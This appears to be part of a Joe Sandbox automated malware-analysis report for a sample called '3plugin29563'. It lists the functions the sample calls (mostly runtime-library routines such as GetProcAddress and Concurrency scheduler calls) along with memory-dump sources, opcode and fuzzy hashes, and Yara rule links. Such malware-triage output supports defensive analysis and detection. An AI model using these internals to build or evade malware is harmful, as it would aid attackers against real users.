GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004082D0
GetProcAddress.KERNEL32(00000000), ref: 004082D7

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: adea10dbdb8c0d44c760c844d01aad44bb84cc435f9f7ea1ee781e3f46f51bd2
Instruction ID: 2b52060881cdc01c7422ec2d016a957ccd6584bd44f59e815f8f4d859b1dac4c
Opcode Fuzzy Hash: adea10dbdb8c0d44c760c844d01aad44bb84cc435f9f7ea1ee781e3f46f51bd2
Instruction Fuzzy Hash: 59512970D002049BDB14EB68DE497DDB775EB85714F5042BEE848A73C1EF399A808B99

Function 02118457 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 021184D0
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02118537
GetProcAddress.KERNEL32(00000000), ref: 0211853E

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: bb6d2b84c723a80dd7d7a673e4683cb2014cb5339b8864daa81aea7f8fb1b55f
Instruction ID: 6441e4003c54877a6989cf938697a87dc9acf81e36a7ce2c5c16a5b4b03601ba
Opcode Fuzzy Hash: bb6d2b84c723a80dd7d7a673e4683cb2014cb5339b8864daa81aea7f8fb1b55f
Instruction Fuzzy Hash: DA512470D402189FEB24DB28DD48BDDBB76EB45314F5082B8E809A73C0EB358A84CF95

Function 00434BB5 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00434C06
TypeidsEqual.LIBVCRUNTIME ref: 00434C2B
PMDtoOffset.LIBCMT ref: 00434C41
PMDtoOffset.LIBCMT ref: 00434CC2

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: f07e3796ec7ba0d874a42cee8ad252877230771386d60420142a4850904b3947
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: 46519B35A0420A9FDF10CF68C4806EEBBF4EF99314F15649AE850A7391D33AB945CB94

Function 02144E1C Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 02144E6D
TypeidsEqual.LIBVCRUNTIME ref: 02144E92
PMDtoOffset.LIBCMT ref: 02144EA8
PMDtoOffset.LIBCMT ref: 02144F29

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: f7eec2230239253de9106168151cbb7e52bfd86c2512ed981e2d6b0e39e3d9cb
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: 8251BA3594420A9FDF10CFA9C480BEEFBF5EF15218F15469AE858A7350DB36AA05CB90

Function 00445EFE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00445FCE
_free.LIBCMT ref: 00445FF7
SetEndOfFile.KERNEL32(00000000,0044193A,00000000,0043ABC2,?,?,?,?,?,?,?,0044193A,0043ABC2,00000000), ref: 00446029
GetLastError.KERNEL32(?,?,?,?,?,?,?,0044193A,0043ABC2,00000000,?,?,?,?,00000000), ref: 00446045

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: a64735c92fc1d7e95804ed15c563a6c46c005c7e2516181bfeef1488fef70a72
Instruction ID: 240237a33f40b9805bcca60291e5e8db341907a71cff97f665ef77216e49a9b1
Opcode Fuzzy Hash: a64735c92fc1d7e95804ed15c563a6c46c005c7e2516181bfeef1488fef70a72
Instruction Fuzzy Hash: 6F410972900A05ABFF11AB668C42B9E3765EF49324F24111BF514E7393E67CDC44876A

Function 00402E80 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00402F1F
GetCurrentThreadId.KERNEL32 ref: 00402F3E
__Mtx_unlock.LIBCPMT ref: 00402F8C
__Cnd_broadcast.LIBCPMT ref: 00402FA3

Part of subcall function 0041C64C: mtx_do_lock.LIBCPMT ref: 0041C654

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
String ID:
API String ID: 3471820992-0
Opcode ID: 6d8634661d44b24a2f1800ce384b9f78303609f5f4907df165cb5b59d9115a97
Instruction ID: 9f10a616376bbfbfaa7b65799a51328619a3d018739bd2478a370d47c393eeb6
Opcode Fuzzy Hash: 6d8634661d44b24a2f1800ce384b9f78303609f5f4907df165cb5b59d9115a97
Instruction Fuzzy Hash: 2241C0B09006069BDB10DF65CA89B9AB7F8FF14354F00463EE816E7780EB78E900DB85

Function 021130E7 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 02113186
GetCurrentThreadId.KERNEL32 ref: 021131A5
__Mtx_unlock.LIBCPMT ref: 021131F3
__Cnd_broadcast.LIBCPMT ref: 0211320A

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: d30519bd5c2df52d2b7e00916fd9a19252df00da1a9962264354fb1a93633b2f
Instruction ID: 3af007299a59cfb0a004e2ae2930d8f2deba65cac2ce43c16b4f6f9174d74645
Opcode Fuzzy Hash: d30519bd5c2df52d2b7e00916fd9a19252df00da1a9962264354fb1a93633b2f
Instruction Fuzzy Hash: 9741CEB09806259FDB14EF74C94476AB7E8EF05314F00857AE929D7680EB34E618CBC1

Function 02156165 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02156235
_free.LIBCMT ref: 0215625E
SetEndOfFile.KERNEL32(00000000,02151BA1,00000000,0214AE29,?,?,?,?,?,?,?,02151BA1,0214AE29,00000000), ref: 02156290
GetLastError.KERNEL32(?,?,?,?,?,?,?,02151BA1,0214AE29,00000000,?,?,?,?,00000000), ref: 021562AC

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: a64735c92fc1d7e95804ed15c563a6c46c005c7e2516181bfeef1488fef70a72
Instruction ID: 9b28594310f6b3303a042deb8b2d94bec2981bdbe3e6fb7b5246ddff8691b37e
Opcode Fuzzy Hash: a64735c92fc1d7e95804ed15c563a6c46c005c7e2516181bfeef1488fef70a72
Instruction Fuzzy Hash: 6041B5729802A4DFDB216FB4CC44B9D777AEF45361F554690EC38E72A0EB34C8418BA0

Function 02141D2D Relevance: 6.1, APIs: 4, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02141D46

Part of subcall function 02142015: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02141A8E), ref: 02142025

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02141D5B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02141D6A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02141E2E

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID:
API String ID: 1312548968-0
Opcode ID: f8db278b2be702a89df8ee59d0553bbb71f604d75d9491b350bbaf38b79f034c
Instruction ID: 85e503b442509a49c1e980ef1240268fcac22d5ea110e0b36204cd394c0216dd
Opcode Fuzzy Hash: f8db278b2be702a89df8ee59d0553bbb71f604d75d9491b350bbaf38b79f034c
Instruction Fuzzy Hash: 7431C475A80214BFCF09EF68C884A6D77B6AF44314F204569EC1DAB291DF71EA45CA90

Function 00422C9C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422CAF

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 07249c23c52b0010c3fd87b1c68d2ca0ee0db9b0017b923e638e4ded83c67244
Instruction ID: 006fe0fa027cfed1b4a46941dabfa7cb084e396ff4fa698d8b3ec5196689cd94
Opcode Fuzzy Hash: 07249c23c52b0010c3fd87b1c68d2ca0ee0db9b0017b923e638e4ded83c67244
Instruction Fuzzy Hash: 4C316A75A00319EFCF14DF95E6C0BAE7BB9AF44304F5000AADD05AB342D7B4A945CB95

Function 02132F03 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 02132F16

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 07249c23c52b0010c3fd87b1c68d2ca0ee0db9b0017b923e638e4ded83c67244
Instruction ID: 3b25376b0bbe687db0310b0dd132063296a189b8111584453a5909bf58cc3d0d
Opcode Fuzzy Hash: 07249c23c52b0010c3fd87b1c68d2ca0ee0db9b0017b923e638e4ded83c67244
Instruction Fuzzy Hash: 15313775A40309DFCF16EF94C8C0AAEBBBAAF44314F1400AADD55AB346D770AD45CB90

Function 0043D87F Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0043696C: _free.LIBCMT ref: 0043697A

Part of subcall function 0043E856: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00444CF0,?,00000000,00000000), ref: 0043E8F8

GetLastError.KERNEL32 ref: 0043D8E7
__dosmaperr.LIBCMT ref: 0043D8EE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043D92D
__dosmaperr.LIBCMT ref: 0043D934

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 3bcd8734fe5236a20b5010267d93085e347ea9c5dfaaec95b23b6b26ce703f85
Instruction ID: fe0f6f9e6451eebc5b723b0727fd1af71719d671d86ec73569b6df80699bb852
Opcode Fuzzy Hash: 3bcd8734fe5236a20b5010267d93085e347ea9c5dfaaec95b23b6b26ce703f85
Instruction Fuzzy Hash: B721F9B1E04205AFD720AF62AC41A27776CEF5C378F10911AF47997251D738EC008B94

Function 0214DAE6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 02146BD3: _free.LIBCMT ref: 02146BE1

Part of subcall function 0214EABD: WideCharToMultiByte.KERNEL32(02118877,00000000,0045FB78,00000000,02118877,02118877,021507E6,?,0045FB78,?,00000000,?,02150555,0000FDE9,00000000,?), ref: 0214EB5F

GetLastError.KERNEL32 ref: 0214DB4E
__dosmaperr.LIBCMT ref: 0214DB55
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0214DB94
__dosmaperr.LIBCMT ref: 0214DB9B

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 515aa144238605869475af97969ef2d5707eff47959053ca5f5507751980a644
Instruction ID: 6f294f2f3b8490c45d64891866df5450ea69a87d64491970329a9dd246ecf046
Opcode Fuzzy Hash: 515aa144238605869475af97969ef2d5707eff47959053ca5f5507751980a644
Instruction Fuzzy Hash: 9E21B671680615AF9F30AF75AC80E6BB7AEFF063A47114655F82D97680DF30EC418BA0

Function 02141A2E Relevance: 6.1, APIs: 4, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02141A89
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02141AA8
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 02141AEF

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID:
API String ID: 1284976207-0
Opcode ID: ae07365b94ca23c4650cd0b3605938529dcb011693e7a54dc77f8391084589f6
Instruction ID: f1bc60541af6fd5c8fb9d4305fd238d4031487032523072afe0443d655631067
Opcode Fuzzy Hash: ae07365b94ca23c4650cd0b3605938529dcb011693e7a54dc77f8391084589f6
Instruction Fuzzy Hash: 6E21F3357802167FCB09AB68C894BBD73A6BF84374B11016BE51D87691CF64A881CEA0

Function 00430A38 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 00430A89
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430A71

Part of subcall function 00428ECF: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428EF0

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430AEC
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F518), ref: 00430AF1

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: d0bec19143808023cefc508b6f86499efe9b602dd7748a6caac56014a2a7309d
Instruction ID: e0170c6427d48b95e9cb560353ddfebd755dde8f4c8f45ae1cfbff99f1b1a539
Opcode Fuzzy Hash: d0bec19143808023cefc508b6f86499efe9b602dd7748a6caac56014a2a7309d
Instruction Fuzzy Hash: 45210735700314AFC710FB69DC45D6EB7ACEF48325F10015BFA15A3292DB74AD018AA9

Function 02140C9F Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 02140CF0
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 02140CD8

Part of subcall function 02139136: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 02139157

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 02140D53
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F518), ref: 02140D58

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: d0bec19143808023cefc508b6f86499efe9b602dd7748a6caac56014a2a7309d
Instruction ID: af2f11aab8a7a2b55599825f0264785b3037d3ee1bdffd707fe6f9b2da1b47b8
Opcode Fuzzy Hash: d0bec19143808023cefc508b6f86499efe9b602dd7748a6caac56014a2a7309d
Instruction Fuzzy Hash: 5C212675640218AFCB14EB69CC44D6EB7BEEF48760F100156FA16A32D1CF70AD058AA5

Function 02139E9C Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 02139EA3
std::bad_exception::bad_exception.LIBCMT ref: 02139F05
Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 02139F47
std::bad_exception::bad_exception.LIBCMT ref: 02139F71

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
String ID:
API String ID: 3836581985-0
Opcode ID: 0182e5b58d836a163dec9a48f0f5d049cb939aff4713fc28892c266688b1b148
Instruction ID: 36f1e8168133620f980d20f63a2313a9001298574c9430738ae695fe5e0f2b0c
Opcode Fuzzy Hash: 0182e5b58d836a163dec9a48f0f5d049cb939aff4713fc28892c266688b1b148
Instruction Fuzzy Hash: 9B21F572984614DFCF06EFA4D480AADBBBBEF05314B21406AF405EB260DBB16E45CF94

Function 0214B314 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
Instruction ID: e0cc7b5b73448784f3f3a2152eb3bb95afdf2b694ffecc4f989bf5a9474027ef
Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
Instruction Fuzzy Hash: 0B21D532E89328ABCB218B669C45B2F37689F0176DF260521ED1DA7291DF70EF00C5E4

Function 021350A9 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 02135108
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0213512B
__EH_prolog3.LIBCMT ref: 02135146
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 0213516D

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID:
API String ID: 2642201467-0
Opcode ID: b39dd8bddcc5c7349a30e2aadaed4e1500d9f46bf60a7d0c83ddef208e4b11ad
Instruction ID: f2b9f0480340bc28f6b93fa44a6a3805dc970053efe557c3f9bb0929ee668b09
Opcode Fuzzy Hash: b39dd8bddcc5c7349a30e2aadaed4e1500d9f46bf60a7d0c83ddef208e4b11ad
Instruction Fuzzy Hash: 6521FC35640215BFCB19EFA8C890AAD77B7FF48704F50402AE9069B290DB72AE05CF90

Function 004312CF Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00431363
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431314

Part of subcall function 004282BB: SafeRWList.LIBCONCRT ref: 004282CC

SafeRWList.LIBCONCRT ref: 00431359
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431379

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 336577199-0
Opcode ID: ad6915c17ecc598f61febc8de0377271cd8df12be60d6096f8761c691dbbb869
Instruction ID: 5eb8c1a059147bef0845f506d8fdd913afa628c0c6829746939689d5b4e2b676
Opcode Fuzzy Hash: ad6915c17ecc598f61febc8de0377271cd8df12be60d6096f8761c691dbbb869
Instruction Fuzzy Hash: 4721F53160120ADFC704DF20C881FA5F7A9BB84718F50D2ABD8054B652DB39E89ACB94

Function 02141536 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 021415CA
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 0214157B

Part of subcall function 02138522: SafeRWList.LIBCONCRT ref: 02138533

SafeRWList.LIBCONCRT ref: 021415C0
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 021415E0

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 336577199-0
Opcode ID: ad6915c17ecc598f61febc8de0377271cd8df12be60d6096f8761c691dbbb869
Instruction ID: 69ac5804aee9a7a44597de6ca5312fe50dc1533826931125f04585131663f196
Opcode Fuzzy Hash: ad6915c17ecc598f61febc8de0377271cd8df12be60d6096f8761c691dbbb869
Instruction Fuzzy Hash: 9821957168420EAFC704DF24C980FA5F7EAFB45314F14D2A6E40A4F541DB35E599CB90

Function 021461BE Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
Instruction ID: 516b1709982e37404ce3b862a6bf2bf1f99e9a136c9b85294b625b6d6a43cd58
Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
Instruction Fuzzy Hash: 0511C871E81365BBCB224B689C44F1A376CAF47B68F150522ED1EA7291DF30ED00C6E4

Function 0041F28D Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041F2AF

Part of subcall function 0041F46B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425426

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0041F2D0

Part of subcall function 00420152: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0042016E

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0041F2EC
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0041F2F3

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 72e411914cb0fcf8d13f58c9890a88af7cfc82562902891560afe0679e3bd405
Instruction ID: 67c9ecace464d3c3806fc6c29cdfd15d646ffdef39c48597f3148e515c988fd5
Opcode Fuzzy Hash: 72e411914cb0fcf8d13f58c9890a88af7cfc82562902891560afe0679e3bd405
Instruction Fuzzy Hash: 49012B715003057BC7207F56CC419DBBBACEF11358B60453FF85592142D779E58A87AA

Function 0212F4F4 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0212F516

Part of subcall function 0212F6D2: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 0213568D

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0212F537

Part of subcall function 021303B9: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 021303D5

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0212F553
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0212F55A

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 72e411914cb0fcf8d13f58c9890a88af7cfc82562902891560afe0679e3bd405
Instruction ID: 9c852e4fafa5275b54ccee2e6617a8f8400c69ec5c59ff3f03dae48c50eaac63
Opcode Fuzzy Hash: 72e411914cb0fcf8d13f58c9890a88af7cfc82562902891560afe0679e3bd405
Instruction Fuzzy Hash: 3301F9B15803156FD730BF68CC808ABFBBDDF10358F10442AB86592550D770996ACFA1

